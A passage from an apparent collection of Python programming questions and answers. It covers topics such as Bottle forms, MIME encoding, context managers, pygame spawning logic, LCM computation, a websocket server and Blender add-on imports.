bb.append(ax.get_tightbbox(renderer))
_bbox = Bbox.union([b for b in bb if b.width != 0 or b.height != 0])
bbox_inches = TransformedBbox(_bbox,
Affine2D().scale(1. / self.dpi))
return bbox_inches
The only consideration that goes into deciding whether an axes is 'visible' is whether
`ax.get_visible()` returns true, even if the axes contains no visible artists (either
`artist.get_visible() == False` or simply transparent ones).
The bounding box behavior you observe is the correct behavior.
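One workaround along the lines the question already mentions (computing the bounding
box yourself) is to take the tight bbox of only the data axes and pass that to
`savefig`. A sketch, reusing `fig` and `data_ax` from the second snippet and assuming
an Agg-based canvas that exposes `get_renderer()`:
from matplotlib.transforms import Affine2D, TransformedBbox
fig.canvas.draw()                        # make sure a renderer exists
renderer = fig.canvas.get_renderer()     # Agg-family canvases only
tight = data_ax.get_tightbbox(renderer)  # bbox of the visible axes, in display units
bbox = TransformedBbox(tight, Affine2D().scale(1.0 / fig.dpi))
fig.savefig('Test3.pdf', bbox_inches=bbox, pad_inches=0)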
|
html post values addition in bottle application
Question: I was trying to add two html form values transferred via post in a python
bottle application. Unfortunately it is just concatenating. I tried to convert
the inputs to int but then I get an "Unhandled Exception Error"... This is my
code:
from bottle import get, post, request,default_app # or route
import math
@get('/login') # or @route('/login')
def login():
return '''
<form action="/login" method="post">
Number1: <input name="num1" type="number" />
Number2: <input name="num2" type="number" />
<input value="Add" type="submit" />
</form>
'''
@post('/login') # or @route('/login', method='POST')
def do_login():
num1 = request.forms.get('num1')
num2 = request.forms.get('num2')
return num1+num2
import os
from bottle import TEMPLATE_PATH
TEMPLATE_PATH.append(os.path.join(os.environ['OPENSHIFT_HOMEDIR'],
'runtime/repo/wsgi/views/'))
application=default_app()
If I type `return (int)num1+(int)num2` an unhandled exception error results. Don't
know why. The same goes for the `type()`, `float()` functions as well.
Answer: I think you just have to convert the return value to str, so try:
`return str(int(num1) + int(num2))`
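For reference, a sketch of the corrected handler; the `str()` matters because bottle
expects the handler to return a string (or another supported body type), not an int,
and `(int)num1` is C-style casting rather than valid Python:
@post('/login')
def do_login():
    num1 = request.forms.get('num1')   # form values arrive as strings
    num2 = request.forms.get('num2')
    return str(int(num1) + int(num2))  # int() to add, str() to return a valid body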
|
How do I change my Content-Transfer-Encoding header in Python?
Question: This is my code right now:
from email.MIMEText import MIMEText
body = "helloworld"
msg = MIMEText(body, 'plain')
msg['Subject']= subject
msg['From'] = from_field['name'] + ' <'+from_field['email']+'>'
msg['Date'] = datetime.datetime.now().strftime('%a, %d %b %Y %H:%M:%S %z')
#other code here for connecting to SMTP
conn.sendmail(from_field['email'],[to_email], msg.as_string()) #finally send the email
My current code produces the following headers:
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="us-ascii"
However, I want my code to produce the following:
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain; charset=iso-8859-1
How can I modify my MIMEText to do this?
Answer: Specifying `_charset` changes the `Content-Transfer-Encoding` and `Content-
Type`
>>> import datetime
>>> from email.MIMEText import MIMEText
>>> body = "helloworld"
>>> msg = MIMEText(body, 'plain', _charset='iso-8859-1')
>>> msg['Subject'] = 'asdf'
>>> msg['From'] = 'name <[email protected]>'
>>> msg['Date'] = datetime.datetime.now().strftime('%a, %d %b %Y %H:%M:%S %z')
>>> print msg
From nobody Sun Oct 13 06:22:32 2013
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Subject: asdf
From: name <[email protected]>
Date: Sun, 13 Oct 2013 06:22:30
helloworld
|
Python disable while iterating
Question: So I am creating a data structure that is based on storage and memory. Let's
say I have the following method:
def __store(self):
#stores information into self.__memory list
now what I want to do is, if this function is called inside a loop, I want it
to be called **only after the loop is finished**
# My reasons
This method gets called in many other methods, most importantly `__setitem__`
so take a look at the following code:
for i in xrange(100):
class[i] = i + 5
right now, this will store the information on every iteration (100
times), but I only want it to store the information after the loop finishes.
# question
essentially I just need to be able to stop a function from running if
iteration is going on in the program, and then execute once the iteration is
done.
**how can I do that?**
# extra info
This data structure is a dictionary that has many functions for memory.
The kind of full-storage memory that I am storing with `__store` is for the
purpose of undoing. Anything in a loop would have no need for an undo
because, until the loop is over, the user should not need to undo anything.
This memory is based on control, so anything inside iteration should not be
stored because there is no need for the actual memory.
That is why I would not like to store during iteration, but, if something that
requires storage is run inside iteration, I would like it to run after the
iteration it was inside completes.
Answer: Having a function behave differently while inside a loop is a bad idea; try to use
a `context manager` instead. It is a better way to do this and it is easier to
understand. <http://www.python.org/dev/peps/pep-0343/>
For example:
with sqlite3.connect(":memory:") as conn:
# update will hold in transaction.
for i in xrange(100):
conn.execute("insert ....")
pass
# sqlite3 will commit now
In the same way:
with a() as b:
# data won't store
for i in xrange(100):
# don't store data
b[i] = i + 5
pass
# data store while leave context
# EDIT 1
A context manager has `__enter__` and `__exit__` methods:
class MemoryManager(object):
def __init__(self):
self.cache = {}
self.buffer = False
def __enter__(self):
self.buffer = True
return self  # return the manager so `with m as b:` binds b to it
def __store(self):
# store data
pass
def __setitem__(self, key, value):
self.cache[key] = value
if not self.buffer:
self.__store()
def __exit__(self, exc_type, exc_value, traceback):
self.__store()
self.buffer = False
Therefore
m = MemoryManager()
with m as b:
# __enter__ got called, set the manager to buffer mode
# data won't store
for i in xrange(100):
# don't store data
m[i] = i + 5 # in with block, so __store won't be called
pass
# __exit__ got called, __store automatically and leave buffer mode
m[0] = 10 # not in buffer mode, __store will be called
|
importing python modules - ImageChops
Question: I'm looking for a good way to analyze image similarity, using python. I'm NOT
looking for a way to establish whether two images are identical. I'm just
looking for a way to establish the similarity between two images (e.g., if two
images are very similar they could be given a "grade" of 9/10; if they are
completely unalike, they'll be given a very low index, such as 2/10). From
some reading that I've done, the module ImageChops has been suggested -
however, I haven't been able to find a way to download it. If anyone knows how
to download it, or has a suggestion for other effective solutions, I'd greatly
appreciate their advice!
Thanks in advance!
Answer: [ImageChops is a module from PIL (Pillow)](https://github.com/python-
imaging/Pillow/blob/master/PIL/ImageChops.py). To use the ImageChops functions
you need to `pip install Pillow` OR `easy_install Pillow` OR [download the
src](https://github.com/python-imaging/Pillow), extract it, then from CMD
cd to the extracted folder & run `python setup.py install`.
To use ImageChops you can do `from PIL import ImageChops`. You can read the
[document section](http://pillow.readthedocs.org/en/latest/PIL.html); some basic usage
examples are at <http://effbot.org/imagingbook/imagechops.htm>
To check the difference between 2 images:
from PIL import Image
from PIL import ImageChops
im1 = Image.open("splash.png")
im2 = Image.open("splash2.png")
diff = ImageChops.difference(im2, im1)
There's a [compare images script](https://gist.github.com/astanin/626356), but
it's not PIL-based; it uses the [scipy module](https://github.com/scipy/scipy). You may
also check [this script
here](http://code.activestate.com/recipes/577630-comparing-two-images/)
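If you want a single similarity "grade" out of the difference image, one very rough
heuristic (a sketch, not a perceptual metric) is to map the mean per-pixel difference
onto a 0-10 scale:
from PIL import Image, ImageChops
def similarity_score(path1, path2):
    im1 = Image.open(path1).convert("RGB")
    im2 = Image.open(path2).convert("RGB").resize(im1.size)
    diff = ImageChops.difference(im1, im2)
    hist = diff.histogram()              # 256 bins per channel, concatenated
    total = sum((i % 256) * count for i, count in enumerate(hist))
    npixels = im1.size[0] * im1.size[1] * 3
    mean_diff = total / float(npixels)   # 0 (identical) .. 255 (opposite)
    return round(10 * (1 - mean_diff / 255.0), 1)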
|
Python Printing the String Result
Question:
import operator
def mkEntry(file1):
results = []
for line in file1:
lst = line.rstrip().split(",")
lst[2] = int(lst[2])
results.append(lst)
return print(sorted(results, key=operator.itemgetter(1,2)))
def main():
openFile = 'names/' + 'yob' + input("Enter the Year: ") + '.txt'
file1 = open(openFile)
mkEntry(file1)
main()
File:
Emily,F,25021
Emma,F,21595
Madison,F,20612
Olivia,F,16100
Joaquin,M,711
Maurice,M,711
Kade,M,701
Rodrigo,M,700
Tate,M,699
How do I print out the result so it looks like this: 1. Name (Gender): Numbers
instead of ['name', 'gender', numbers]?
I have trouble doing the string formatting; it won't give me the desired output. Any
help?
Thanks
Answer: `return print(sorted(results, key=operator.itemgetter(1,2)))` isn't doing what
you'd expect it to.
Because `print()` returns `None`, your function will `return None`. Get rid of
the print statement (if you want to print the line, just put it before the
return)
Then you can do in your `main()` function:
for person in mkEntry(file1):
print("1. {0} ({1}): {2}".format(*person))
|
Sequential pattern matching algorithm in Python
Question: I find myself in a situation where I need to implement an algorithm for
sequential pattern matching in Python. I can't find any working library/snippet
on the internet after searching for hours.
problem definition:
implement a function sequential_pattern_match
> input: tokens, (an ordered collection of strings)
>
> output: a list of tuples, each tuple = (any subcollection of tokens, tag)
domain experts will define the matching rule, usually using regex
> test(tokens) -> tag or None
Example:
> input: ["Singapore", "Python", "User", "Group", "is", "here"]
>
> output: [(["Singapore", "Python", "User", "Group"], "ORGANIZATION"), ("is",
> 'O'), ("here", 'O')]
'O' means no match.
Conflict resolution rules:
1. a match that appears first has higher precedence. e.g. "Singapore property sales", if two conflicting matches are possible, "Singapore property" as asset and "property sales" as event, then the first one is used.
2. a longer match has higher precedence than shorter match. e.g. "Singapore Python User Group" as organization takes higher precedence than individual matches of "Singapore" as location + "Python" as language.
With my expertise in algorithms and data structure, this is my implementation:
from itertools import ifilter, imap
MAX_PATTERN_LENGTH = 3
def test(tokens):
length = len(tokens)
if (length == 1):
if tokens[0] == "Nexium":
return "MEDICINE"
elif tokens[0] == "pain":
return "SYMPTOM"
elif (length == 2):
string = ' '.join(tokens)
if string == "Barium Swallow":
return "INTERVENTION"
elif string == "Swallow Test":
return "INTERVENTION"
else:
if ' '.join(tokens) == "pain in stomach":
return "SYMPTOM"
def _evaluate(tokens):
tag = test(tokens)
if tag:
return (tokens, tag)
elif len(tokens) == 1:
return (tokens, 'O')
def _splits(tokens):
return ((tokens[:i], tokens[i:]) for i in xrange(min(len(tokens), MAX_PATTERN_LENGTH), 0, -1))
def sequential_pattern_match(tokens):
return ifilter(bool, imap(_halves_match, _splits(tokens))).next()
def _halves_match(halves):
result = _evaluate(halves[0])
if result:
return [result] + (halves[1] and sequential_pattern_match(halves[1]))
if __name__ == "__main__":
tokens = "I went to a clinic to do a Barium Swallow Test because I had pain in stomach after taking Nexium".split()
output = sequential_pattern_match(tokens)
slashTags = ' '.join(t + '/' + tag for tokens, tag in output for t in tokens)
print(slashTags)
assert slashTags == "I/O went/O to/O a/O clinic/O to/O do/O a/O Barium/INTERVENTION Swallow/INTERVENTION Test/O because/O I/O had/O pain/SYMPTOM in/SYMPTOM stomach/SYMPTOM after/O taking/O Nexium/MEDICINE"
import timeit
t = timeit.Timer(
'sequential_pattern_match("I went to a clinic to do a Barium Swallow Test because I had pain in stomach after taking Nexium".split())',
'from __main__ import sequential_pattern_match'
)
print(t.repeat(3, 10000))
I don't think it can be faster. Unfortunately it was written in functional
style, which may be unsuitable in Python. Are you able to come up with a
faster implementation in OO or imperative style?
(Note: I am sure it will be faster if implemented in C, but currently I have
no plan of using other language other than Python)
Answer:
def sequential_pattern_match(tokens):
for first, rest in _splits(tokens):
x = _halves_match(first, rest)
if x:
return x
def _splits(tokens):
for i in xrange(min(len(tokens), MAX_PATTERN_LENGTH), 0, -1):
yield tokens[:i], tokens[i:]
def _halves_match(first, rest):
tag = test(first)
if tag:
return [(first, tag)] + (rest and sequential_pattern_match(rest))
def test(tokens):
length = len(tokens)
if length == 1:
if tokens[0] == "Nexium":
return "MEDICINE"
elif tokens[0] == "pain":
return "SYMPTOM"
else:
return "O"
elif length == 2:
if tokens == ["Barium", "Swallow"]:
return "INTERVENTION"
elif tokens == ["Swallow", "Test"]:
return "INTERVENTION"
elif tokens == ["pain", "in", "stomach"]:
return "SYMPTOM"
Replaced `ifilter` and `imap` with a simple `for` loop, and the generator expression
with a `for` loop using `yield`.
Time reduced on my machine:
* _1.02694065435_ -> _0.708227394544_ (Python 2.7.5)
* _1.1575780184_ -> _0.425939527209_ (PyPy 2.1)
|
Displaying an amount of objects on to the screen and positioning
Question: I am following this tutorial: <http://www.raywenderlich.com/24252/beginning-
game-programming-for-teens-with-python#comments> And I am trying to reduce the
number of badgers drawn to the screen in the part where the badgers are
drawn. It looks to me as if the `random.randint(50,430)` draws a number of
badgers between 50 and 430, but I would like a smaller number, say 5-9 badgers,
drawn on the screen. I would also like to know the position the badgers are
coming from. I would like it so the badgers fall from the air. How do I do this?
if badtimer==0:
badguys.append([640, random.randint(50,430)])
badtimer=100-(badtimer1*2)
if badtimer1>=35:
badtimer1=35
else:
badtimer1+=5
index=0
for badguy in badguys:
if badguy[0]<-64:
badguys.pop(index)
badguy[0]-=7
index+=1
for badguy in badguys:
screen.blit(badguyimg, badguy)
here is the full code:
# 1 - Import library
import pygame
from pygame.locals import *
import math
import random
# 2 - Initialize the game
pygame.init()
width, height = 640, 480
screen=pygame.display.set_mode((width, height))
keys = [False, False, False, False]
playerpos=[100,100]
acc=[0,0]
arrows=[]
badtimer=100
badtimer1=0
badguys=[[640,100]]
healthvalue=194
pygame.mixer.init()
# 3 - Load image
player = pygame.image.load("resources/images/dude.png")
grass = pygame.image.load("resources/images/grass.png")
castle = pygame.image.load("resources/images/castle.png")
arrow = pygame.image.load("resources/images/bullet.png")
badguyimg1 = pygame.image.load("resources/images/badguy.png")
badguyimg=badguyimg1
healthbar = pygame.image.load("resources/images/healthbar.png")
health = pygame.image.load("resources/images/health.png")
gameover = pygame.image.load("resources/images/gameover.png")
youwin = pygame.image.load("resources/images/youwin.png")
# 3.1 - Load audio
hit = pygame.mixer.Sound("resources/audio/explode.wav")
enemy = pygame.mixer.Sound("resources/audio/enemy.wav")
shoot = pygame.mixer.Sound("resources/audio/shoot.wav")
hit.set_volume(0.05)
enemy.set_volume(0.05)
shoot.set_volume(0.05)
pygame.mixer.music.load('resources/audio/moonlight.wav')
pygame.mixer.music.play(-1, 0.0)
pygame.mixer.music.set_volume(0.25)
# 4 - keep looping through
running = 1
exitcode = 0
while running:
badtimer-=1
# 5 - clear the screen before drawing it again
screen.fill(0)
# 6 - draw the player on the screen at X:100, Y:100
for x in range(0, int(width/grass.get_width()+1)):
for y in range(0, int(height/grass.get_height()+1)):
screen.blit(grass,(x*100,y*100))
screen.blit(castle,(0,30))
screen.blit(castle,(0,135))
screen.blit(castle,(0,240))
screen.blit(castle,(0,345 ))
# 6.1 - Set player position and rotation
position = pygame.mouse.get_pos()
angle = math.atan2(position[1]-(playerpos[1]+32),position[0]-(playerpos[0]+26))
playerrot = pygame.transform.rotate(player, 360-angle*57.29)
playerpos1 = (playerpos[0]-playerrot.get_rect().width/2, playerpos[1]-playerrot.get_rect().height/2)
screen.blit(playerrot, playerpos1)
# 6.2 - Draw arrows
for bullet in arrows:
index=0
velx=math.cos(bullet[0])*10
vely=math.sin(bullet[0])*10
bullet[1]+=velx
bullet[2]+=vely
if bullet[1]<-64 or bullet[1]>640 or bullet[2]<-64 or bullet[2]>480:
arrows.pop(index)
index+=1
for projectile in arrows:
arrow1 = pygame.transform.rotate(arrow, 360-projectile[0]*57.29)
screen.blit(arrow1, (projectile[1], projectile[2]))
# 6.3 - Draw badgers
if badtimer==0:
badguys.append([640, random.randint(50,430)])
badtimer=100-(badtimer1*2)
if badtimer1>=35:
badtimer1=35
else:
badtimer1+=5
index=0
for badguy in badguys:
if badguy[0]<-64:
badguys.pop(index)
badguy[0]-=7
# 6.3.1 - Attack castle
badrect=pygame.Rect(badguyimg.get_rect())
badrect.top=badguy[1]
badrect.left=badguy[0]
if badrect.left<64:
hit.play()
healthvalue -= random.randint(5,20)
badguys.pop(index)
#6.3.2 - Check for collisions
index1=0
for bullet in arrows:
bullrect=pygame.Rect(arrow.get_rect())
bullrect.left=bullet[1]
bullrect.top=bullet[2]
if badrect.colliderect(bullrect):
enemy.play()
acc[0]+=1
badguys.pop(index)
arrows.pop(index1)
index1+=1
# 6.3.3 - Next bad guy
index+=1
for badguy in badguys:
screen.blit(badguyimg, badguy)
# 6.4 - Draw clock
font = pygame.font.Font(None, 24)
survivedtext = font.render(str((90000-pygame.time.get_ticks())/60000)+":"+str((90000-pygame.time.get_ticks())/1000%60).zfill(2), True, (0,0,0))
textRect = survivedtext.get_rect()
textRect.topright=[635,5]
screen.blit(survivedtext, textRect)
# 6.5 - Draw health bar
screen.blit(healthbar, (5,5))
for health1 in range(healthvalue):
screen.blit(health, (health1+8,8))
# 7 - update the screen
pygame.display.flip()
# 8 - loop through the events
for event in pygame.event.get():
# check if the event is the X button
if event.type==pygame.QUIT:
# if it is quit the game
pygame.quit()
exit(0)
if event.type == pygame.KEYDOWN:
if event.key==K_w:
keys[0]=True
elif event.key==K_a:
keys[1]=True
elif event.key==K_s:
keys[2]=True
elif event.key==K_d:
keys[3]=True
if event.type == pygame.KEYUP:
if event.key==pygame.K_w:
keys[0]=False
elif event.key==pygame.K_a:
keys[1]=False
elif event.key==pygame.K_s:
keys[2]=False
elif event.key==pygame.K_d:
keys[3]=False
if event.type==pygame.MOUSEBUTTONDOWN:
shoot.play()
position=pygame.mouse.get_pos()
acc[1]+=1
arrows.append([math.atan2(position[1]-(playerpos1[1]+32),position[0]-(playerpos1[0]+26)),playerpos1[0]+32,playerpos1[1]+32])
# 9 - Move player
if keys[0]:
playerpos[1]-=5
elif keys[2]:
playerpos[1]+=5
if keys[1]:
playerpos[0]-=5
elif keys[3]:
playerpos[0]+=5
#10 - Win/Lose check
if pygame.time.get_ticks()>=90000:
running=0
exitcode=1
if healthvalue<=0:
running=0
exitcode=0
if acc[1]!=0:
accuracy=acc[0]*1.0/acc[1]*100
else:
accuracy=0
# 11 - Win/lose display
if exitcode==0:
pygame.font.init()
font = pygame.font.Font(None, 24)
text = font.render("Accuracy: "+str(accuracy)+"%", True, (255,0,0))
textRect = text.get_rect()
textRect.centerx = screen.get_rect().centerx
textRect.centery = screen.get_rect().centery+24
screen.blit(gameover, (0,0))
screen.blit(text, textRect)
else:
pygame.font.init()
font = pygame.font.Font(None, 24)
text = font.render("Accuracy: "+str(accuracy)+"%", True, (0,255,0))
textRect = text.get_rect()
textRect.centerx = screen.get_rect().centerx
textRect.centery = screen.get_rect().centery+24
screen.blit(youwin, (0,0))
screen.blit(text, textRect)
while 1:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
exit(0)
pygame.display.flip()
Answer: Only 1 badger is added each time badtimer==0. The line badguys.append([640,
random.randint(50,430)]) adds a new badguy at that location (x=640,
y=random.randint(50,430)) on the screen.
If you want to change the number of bad guys loaded you have to change this
part of the code
if badtimer==0:
badguys.append([640, random.randint(50,430)])
badtimer=100-(badtimer1*2)
if badtimer1>=35:
badtimer1=35
else:
badtimer1+=5
There are two variables that the spawning of badguys depends on: **badtimer**
and **badtimer1**.
**badtimer1** is used to increase the rate at which badguys are spawned as the
game goes on (technically it increments each time a badguy is spawned).
**badtimer** is used to actually create the badguys every so often; it is
decremented each loop.
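As a sketch of one way to keep the on-screen count small (an assumption about what
"a smaller number, say 5-9" means), you could only spawn while the list is below a
chosen cap:
MAX_BADGUYS = random.randint(5, 9)   # chosen once, near the other globals at the top
if badtimer==0 and len(badguys) < MAX_BADGUYS:
    badguys.append([640, random.randint(50,430)])
    badtimer=100-(badtimer1*2)
    # ... rest of the spawn block unchanged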
* * *
To have them fall from the sky you need to change their original starting
point and their updating.
badguys.append([random.randint(50,590), 0])
and Updating
for badguy in badguys:
if badguy[1]>480:  # remove badguys once they have fallen past the bottom of the 480px-high screen
badguys.pop(index)
badguy[1]+=7 # You can change this number if it is too fast
|
Project Euler getting smallest multiple in python
Question: I am doing problem five in Project Euler: "2520 is the smallest number that
can be divided by each of the numbers from 1 to 10 without any remainder.
What is the smallest positive number that is evenly divisible by all of the
numbers from 1 to 20?"
I have constructed the following code which finds the correct value 2520 when
using 1 - 10 as divisors but code seems to be going on forever when using 1 -
20. Again, I don't want the code, just a pointer or two on where I am going
wrong. Thanks
def smallestDiv(n):
end=False
while end == False:
divisors = [x for x in range(1,21)] # get divisors
allDivisions = zip(n % i for i in divisors) # get values for n % all integers in divisors
check = all(item[0] == 0 for item in allDivisions ) # check if all values of n % i are equal to zero
if check: # if all values are equal to zero return n
end = True
return n
else: # else increase n by 1
n +=1
EDIT:
I used some code I found relating to LCM and used reduce to solve the problem:
def lcm(*values):
values = [value for value in values]
if values:
n = max(values)
m = n
values.remove(n)
while any( n % value for value in values ):
n +=m
return n
return 0
print reduce(lcm, range(1,21))
Answer: If a problem is hard, trying solving a simpler version. Here, how to calculate
the lowest common multiple of _two_ numbers. If you've read any number theory
book (or think about prime factors), you can do that using the greatest common
divisor function (as implemented by the Euclidean algorithm).
from fractions import gcd
def lcm(a,b):
"Calculate the lowest common multiple of two integers a and b"
return a*b//gcd(a,b)
Observing `lcm(a,b,c) ≡ lcm(lcm(a,b),c)` it's simple to solve your problem
with Python's
[`reduce`](http://docs.python.org/2/library/functions.html#reduce) function
>>> from functools import reduce
>>> reduce(lcm, range(1,10+1))
2520
>>> reduce(lcm, range(1,20+1))
232792560
|
Multi-threaded websocket server on Python
Question: Please help me to improve this code:
import base64
import hashlib
import threading
import socket
class WebSocketServer:
def __init__(self, host, port, limit, **kwargs):
"""
Initialize websocket server.
:param host: Host name as IP address or text definition.
:param port: Port number, which server will listen.
:param limit: Limit of connections in queue.
:param kwargs: A dict of key/value pairs. It MAY contains:<br>
<b>onconnect</b> - function, called after client connected.
<b>handshake</b> - string, containing the handshake pattern.
<b>magic</b> - string, containing "magic" key, required for "handshake".
:type host: str
:type port: int
:type limit: int
:type kwargs: dict
"""
self.host = host
self.port = port
self.limit = limit
self.running = False
self.clients = []
self.args = kwargs
def start(self):
"""
Start websocket server.
"""
self.root = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.root.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.root.bind((self.host, self.port))
self.root.listen(self.limit)
self.running = True
while self.running:
client, address = self.root.accept()
if not self.running: break
self.handshake(client)
self.clients.append((client, address))
onconnect = self.args.get("onconnect")
if callable(onconnect): onconnect(self, client, address)
threading.Thread(target=self.loop, args=(client, address)).start()
self.root.close()
def stop(self):
"""
Stop websocket server.
"""
self.running = False
def handshake(self, client):
handshake = 'HTTP/1.1 101 Switching Protocols\r\nConnection: Upgrade\r\nUpgrade: websocket\r\nSec-WebSocket-Accept: %s\r\n\r\n'
handshake = self.args.get('handshake', handshake)
magic = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
magic = self.args.get('magic', magic)
header = str(client.recv(1000))
try:
res = header.index("Sec-WebSocket-Key")
except ValueError:
return False
key = header[res + 19: res + 19 + 24]
key += magic
key = hashlib.sha1(key.encode())
key = base64.b64encode(key.digest())
client.send(bytes((handshake % str(key,'utf-8')), 'utf-8'))
return True
def loop(self, client, address):
"""
:type client: socket
"""
while True:
message = ''
m = client.recv(1)
while m != '':
message += m
m = client.recv(1)
fin, text = self.decodeFrame(message)
if not fin:
onmessage = self.args.get('onmessage')
if callable(onmessage): onmessage(self, client, text)
else:
self.clients.remove((client, address))
ondisconnect = self.args.get('ondisconnect')
if callable(ondisconnect): ondisconnect(self, client, address)
client.close()
break
def decodeFrame(self, data):
if (len(data) == 0) or (data is None):
return True, None
fin = not(data[0] & 1)
if fin:
return fin, None
masked = not(data[1] & 1)
plen = data[1] - (128 if masked else 0)
mask_start = 2
if plen == 126:
mask_start = 4
plen = int.from_bytes(data[2:4], byteorder='sys.byteorder')
elif plen == 127:
mask_start = 10
plen = int.from_bytes(data[2:10], byteorder='sys.byteorder')
mask = data[mask_start:mask_start+4]
data = data[mask_start+4:mask_start+4+plen]
decoded = []
i = 0
while i < len(data):
decoded.append(data[i] ^ mask[i%4])
i+=1
text = str(bytearray(decoded), "utf-8")
return fin, text
def sendto(self, client, data, **kwargs):
"""
Send <b>data</b> to <b>client</b>. <b>data</b> can be of type <i>str</i>, <i>bytes</i>, <i>bytearray</i>, <i>int</i>.
:param client: Client socket for data exchange.
:param data: Data, which will be sent to the client via <i>socket</i>.
:type client: socket
:type data: str|bytes|bytearray|int|float
"""
if type(data) == bytes or type(data) == bytearray:
frame = data
elif type(data) == str:
frame = bytes(data, kwargs.get('encoding', 'utf-8'))
elif type(data) == int or type(data) == float:
frame = bytes(str(data), kwargs.get('encoding', 'utf-8'))
else:
return None
framelen = len(frame)
head = bytes([0x81])
if framelen < 126:
head += bytes(int.to_bytes(framelen, 1, 'big'))
elif 126 <= framelen < 0x10000:
head += bytes(126)
head += bytes(int.to_bytes(framelen, 2, 'big'))
else:
head += bytes(127)
head += bytes(int.to_bytes(framelen, 8, 'big'))
client.send(head + frame)
It works fine. I want the server to use all the processor cores for improved
performance. And this code is not effective with a high number of connections.
How do I implement a multi-threaded solution for this case?
Sorry for my bad english.
Answer: > In CPython, the global interpreter lock, or GIL, is a mutex that prevents
> multiple native threads from executing Python bytecodes at once.
So threads will not let your server use more than one core. You can use
[processes](http://docs.python.org/2/library/multiprocessing.html) instead
of threads (though not with this exact approach on Windows*), [twisted](http://twistedmatrix.com/trac/) or
[asyncore](http://docs.python.org/2/library/asyncore.html) if you want to
support more than one client at the same time.
If your choice is multiprocessing, try this:
client.py:
import socket
def main():
s = socket.socket()
s.connect(("localhost", 5555))
while True:
data = raw_input("> ")
s.send(data)
if data == "quit":
break
s.close()
if __name__ == "__main__":
main()
server.py:
from multiprocessing import Process
from os import getpid
import socket
def receive(conn):
print "(%d) connected." % getpid()
while True:
data = conn.recv(1024)
if data:
if data == "quit":
break
else:
print "(%s) data" % getpid()
def main():
s = socket.socket()
s.bind(("localhost", 5555))
s.listen(1)
while True:
conn, address = s.accept()
print "%s:%d connected." % address
Process(target=receive, args=(conn,)).start()
s.close()
if __name__ == "__main__":
main()
*On Windows this code will throw an error when pickling the socket:
File "C:\Python27\lib\pickle.py", line 880, in load_eof
raise EOFError
|
Splines in pythonOCC
Question: This question is about how to use splines in general in pythonOCC. There are
two parts to this question.
I have found out that I can create a spline by
array = []
array.append(gp_Pnt2d (0,0))
array.append(gp_Pnt2d (1,2))
array.append(gp_Pnt2d (2,3))
array.append(gp_Pnt2d (4,3))
array.append(gp_Pnt2d (5,5))
pt2d_list = point2d_list_to_TColgp_Array1OfPnt2d(array)
SPL1 = Geom2dAPI_PointsToBSpline(pt2d_list).Curve()
display.DisplayShape(make_edge2d(SPL1) , update=True)
And I expect that the bspline can be calculated by
BSPL1 = Geom2dAPI_PointsToBSpline(pt2d_list)
But how do I get:
1. The derivative of the bspline?
2. The knots of the bspline?
3. Is the knots the pt2d_list?
4. The control points of the bspline?
5. The coefficients of the spline?
And how do I remove or add knots to the bspline?
When loading a CAD drawing .stp file in pythonOCC like this:
from OCC import TopoDS, StlAPI
shape = TopoDS.TopoDS_Shape()
stl_reader = StlAPI.StlAPI_Reader()
stl_reader.Read(shape,str(filename))
display.DisplayShape(shape)
How do I get the data out of the shape like knot, bspline, and coefficients.
best regards,
Answer: I would take a look at the [scipy documentation](http://docs.scipy.org/doc/) and
search there for the functions you are trying to apply.
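For example, with `scipy.interpolate` (a sketch, not pythonOCC code; the point values are just
illustrative) the knots, coefficients, derivative and knot insertion are all exposed directly:

    import numpy as np
    from scipy import interpolate

    x = np.array([0.0, 1.0, 2.0, 4.0, 5.0])
    y = np.array([0.0, 2.0, 3.0, 3.0, 5.0])

    # fit a cubic B-spline; tck = (knots, coefficients, degree)
    tck = interpolate.splrep(x, y, k=3)
    knots, coeffs, degree = tck

    ys = interpolate.splev(2.5, tck)          # evaluate the spline
    dy = interpolate.splev(2.5, tck, der=1)   # first derivative

    tck2 = interpolate.insert(3.0, tck)       # insert a knot at x = 3.0

In pythonOCC itself, the `Geom2d_BSplineCurve` returned by `.Curve()` exposes methods such as
`Knots()`, `Poles()`, `Degree()`, `InsertKnot()` and `D1()` for the same information, but check
the pythonOCC/OCC documentation for the exact signatures.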
|
Blender ImportError: cannot import name
Question: I am really almost giving up on trying to create an import-export module addon
to Blender 2.68 and it seems that it is an insurmountable python problem
(Blender uses python 3.3). I see plenty of questions in stackoverflow on this
topic but none of them answers my problem. Part of my script:
if "bpy" in locals():
import imp
imp.reload(xplane_ui)
print ("xplane_ui reloaded.")
imp.reload(explane_import)
print ("All modules reloaded.")
else:
import bpy
from io_explane import xplane_ui
print ("xplane_ui imported.")
from io_explane import explane_import #this is line 47
print ("All modules imported")
I added extra print lines to see what is happening. Here is the trace result:
Read new prefs: C:\Users\BT\AppData\Roaming\Blender Foundation\Blender\2.68\config\userpref.blend
found bundled python: C:\blender-2.68a-windows32\2.68\python
xplane_ui imported
All modules imported
xplane_ui imported.
Traceback (most recent call last):
File "C:\blender-2.68a-windows32\2.68\scripts\modules\addon_utils.py", line 294, in enable
mod = __import__(module_name)
File "C:\blender-2.68a-windows32\2.68\scripts\addons\io_explane\__init__.py", line 47, in <module>
from io_explane import explane_import
ImportError: cannot import name explane_import
This is so strange. I presume Python progresses from top to bottom, but how would
it progress through lines 46, 47 and 48 and then change its decision on line 47
and announce it could not do it after having obviously done it? Either Python
is a useless programming language or Blender is broken, or both. Either way the
error trapping routines are extremely unhelpful.
Answer: I don't know Blender, but could it be that you should import `xplane_import`?
|
Embed Plotly graph into a webpage with Bottle
Question: Hi, I am using Plotly to generate graphs using Python and Bottle. However, this
returns me a URL, like:
https://plot.ly/~abhishek.mitra.963/1
I want to paste the entire graph into my webpage instead of providing a link.
Is this possible?
My code is:
import os
from bottle import run, template, get, post, request
from plotly import plotly
py = plotly(username='user', key='key')
@get('/plot')
def form():
return '''<h2>Graph via Plot.ly</h2>
<form method="POST" action="/plot">
Name: <input name="name1" type="text" />
Age: <input name="age1" type="text" /><br/>
Name: <input name="name2" type="text" />
Age: <input name="age2" type="text" /><br/>
Name: <input name="name3" type="text" />
Age: <input name="age3" type="text" /><br/>
<input type="submit" />
</form>'''
@post('/plot')
def submit():
